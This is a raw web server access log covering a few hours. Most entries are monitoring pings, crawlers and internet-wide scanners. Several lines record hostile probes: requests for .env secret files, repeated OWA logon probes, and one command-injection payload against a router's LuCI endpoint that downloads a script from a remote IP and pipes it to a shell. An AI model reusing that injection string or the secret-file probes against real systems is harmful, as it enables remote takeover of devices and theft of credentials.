195.56.55.225 - - [03/Sep/2024:05:06:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:05:08:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.240.236.109 - - [03/Sep/2024:05:09:19 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 zgrab/0.x"
66.240.236.109 - - [03/Sep/2024:05:09:20 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 zgrab/0.x"
195.56.55.225 - - [03/Sep/2024:05:10:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:05:12:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:05:14:14 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.220 - - [03/Sep/2024:05:15:04 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.95.49.158 - - [03/Sep/2024:05:15:18 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:05:15:19 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
92.249.48.213 - - [03/Sep/2024:05:15:21 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:05:16:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.15 - - [03/Sep/2024:05:17:01 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:05:18:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
139.64.245.59 - - [03/Sep/2024:05:19:18 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
139.64.245.59 - - [03/Sep/2024:05:19:18 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
139.64.245.59 - - [03/Sep/2024:05:19:31 +0200] "POST / HTTP/1.1" 405 310 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
139.64.245.59 - - [03/Sep/2024:05:19:31 +0200] "POST / HTTP/1.1" 405 310 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
71.6.134.234 - - [03/Sep/2024:05:19:33 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
195.56.55.225 - - [03/Sep/2024:05:20:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
71.6.134.234 - - [03/Sep/2024:05:20:58 +0200] "GET /favicon.ico HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
212.95.49.158 - - [03/Sep/2024:05:21:16 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:05:21:16 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
185.224.128.47 - - [03/Sep/2024:05:22:26 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [03/Sep/2024:05:22:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:05:24:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:05:26:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [03/Sep/2024:05:26:54 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
54.36.149.41 - - [03/Sep/2024:05:27:39 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
195.56.55.225 - - [03/Sep/2024:05:28:37 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.199 - - [03/Sep/2024:05:29:48 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:05:30:41 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:05:32:44 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:05:32:49 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:05:32:49 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:05:32:54 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:05:32:54 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:05:33:13 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:05:33:13 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:05:33:54 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:05:33:54 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:05:33:55 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:05:33:56 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:05:34:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
92.249.48.213 - - [03/Sep/2024:05:34:47 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:05:36:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:05:38:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:05:40:56 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:05:42:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
114.119.145.19 - - [03/Sep/2024:05:43:26 +0200] "GET /robots.txt HTTP/1.1" 404 287 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
195.56.55.225 - - [03/Sep/2024:05:45:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
147.185.132.112 - - [03/Sep/2024:05:46:13 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:05:47:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
149.50.103.48 - - [03/Sep/2024:05:47:08 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:05:49:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [03/Sep/2024:05:49:44 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:05:51:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:05:53:14 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:05:55:17 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:05:57:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:05:59:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:06:01:05 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.nuke.zpok.hu/owa/ HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:06:01:05 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:06:01:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:06:03:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:06:05:05 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:06:05:06 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:06:05:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
94.228.169.182 - - [03/Sep/2024:06:07:30 +0200] "GET /.env HTTP/1.1" 404 292 "-" "python-requests/2.26.0"
94.228.169.182 - - [03/Sep/2024:06:07:30 +0200] "POST / HTTP/1.1" 405 322 "-" "python-requests/2.26.0"
195.56.55.225 - - [03/Sep/2024:06:07:36 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
141.98.11.173 - - [03/Sep/2024:06:08:36 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:06:09:39 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:06:10:58 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.swartz.zpok.hu/owa/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:06:10:59 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:06:11:42 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [03/Sep/2024:06:13:17 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [03/Sep/2024:06:13:45 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:06:15:48 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:06:17:51 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:06:18:03 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.okosz.zpok.hu/owa/ HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:06:18:03 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
185.191.126.213 - - [03/Sep/2024:06:19:15 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:06:19:54 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:06:19:57 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:06:19:57 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
89.190.156.137 - - [03/Sep/2024:06:20:10 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
149.50.103.48 - - [03/Sep/2024:06:20:19 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
185.191.126.213 - - [03/Sep/2024:06:20:20 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:06:22:00 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:06:24:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:06:26:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [03/Sep/2024:06:26:09 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.emiss.zpok.hu/owa/ HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:06:26:10 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
205.210.31.177 - - [03/Sep/2024:06:26:46 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.84.89.2 - - [03/Sep/2024:06:27:51 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/6.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Inspici (www.inspici.com)"
195.56.55.225 - - [03/Sep/2024:06:28:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:06:30:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:06:32:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:06:34:22 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.84.89.2 - - [03/Sep/2024:06:35:28 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/6.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Inspici (www.inspici.com)"
195.56.55.225 - - [03/Sep/2024:06:36:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.189.182.234 - - [03/Sep/2024:06:37:01 +0200] "GET / HTTP/1.1" 400 373 "-" "-"
45.148.10.251 - - [03/Sep/2024:06:37:10 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
45.148.10.251 - - [03/Sep/2024:06:37:42 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
195.56.55.225 - - [03/Sep/2024:06:38:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
80.82.77.202 - - [03/Sep/2024:06:40:23 +0200] "\x16\x03\x02\x01o\x01" 501 - "-" "-"
195.56.55.225 - - [03/Sep/2024:06:40:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
91.233.21.70 - - [03/Sep/2024:06:42:10 +0200] "GET /.well-known/acme-challenge/CA88F30YEE0ZD2Q3-7SE-FL7X7UNMYE- HTTP/1.1" 404 335 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:06:42:10 +0200] "GET /.well-known/acme-challenge/DTZEDHT1LT-EO6ZJW47B0_PD2O__VLVZ HTTP/1.1" 404 337 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:06:42:10 +0200] "GET /.well-known/acme-challenge/5494BJDRRZYBKWQKPG9LB6ZZ3ODKNWD6 HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:06:42:10 +0200] "GET /.well-known/acme-challenge/NW6P1137W55B8WNPI9GEJHHHSVGG7VP- HTTP/1.1" 404 338 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:06:42:12 +0200] "GET /.well-known/acme-challenge/_87S9FL5JN-6OL7MI1SC_K2B_W99-JR- HTTP/1.1" 404 341 "-" "Cpanel-HTTP-Client/1.0"
91.233.21.70 - - [03/Sep/2024:06:42:12 +0200] "GET /.well-known/acme-challenge/_GLA7VT_WK-_A7M-J5-Q71U5PLZZ7LX3 HTTP/1.1" 404 342 "-" "Cpanel-HTTP-Client/1.0"
195.56.55.225 - - [03/Sep/2024:06:42:37 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
176.63.7.118 - - [03/Sep/2024:06:42:52 +0200] "GET /futurbi/ HTTP/1.1" 404 281 "http://futurbi.ini.hu/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
66.249.64.169 - - [03/Sep/2024:06:43:02 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.170 - - [03/Sep/2024:06:43:03 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [03/Sep/2024:06:44:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.189.182.234 - - [03/Sep/2024:06:46:06 +0200] "GET / HTTP/1.1" 400 373 "-" "-"
195.56.55.225 - - [03/Sep/2024:06:46:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:06:48:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:06:50:49 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.130 - - [03/Sep/2024:06:50:55 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
124.221.186.26 - - [03/Sep/2024:06:51:52 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36"
124.221.186.26 - - [03/Sep/2024:06:52:02 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36"
124.221.186.26 - - [03/Sep/2024:06:52:22 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36"
124.221.186.26 - - [03/Sep/2024:06:52:27 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36"
149.50.103.48 - - [03/Sep/2024:06:52:51 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [03/Sep/2024:06:52:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.224.128.59 - - [03/Sep/2024:06:54:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%2Ft%7Csh%3B%60) HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
195.56.55.225 - - [03/Sep/2024:06:54:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.104 - - [03/Sep/2024:06:56:21 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:06:56:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:06:59:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.248 - - [03/Sep/2024:06:59:30 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [03/Sep/2024:07:01:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:07:03:08 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
5.8.11.202 - - [03/Sep/2024:07:04:10 +0200] "\x16\x03\x02\x01o\x01" 501 - "-" "-"
212.95.49.158 - - [03/Sep/2024:07:04:38 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.levego.zpok.hu/owa/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:07:04:38 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:07:05:11 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
124.221.186.26 - - [03/Sep/2024:07:05:43 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) MicroMessenger Weixin QQ AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36"
212.95.49.158 - - [03/Sep/2024:07:05:49 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:07:05:49 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
205.210.31.90 - - [03/Sep/2024:07:06:50 +0200] "GET / HTTP/1.0" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.95.49.158 - - [03/Sep/2024:07:06:58 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.leyeg.zpok.hu/owa/ HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [03/Sep/2024:07:06:58 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [03/Sep/2024:07:07:14 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/Sep/2024:07:09:17 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
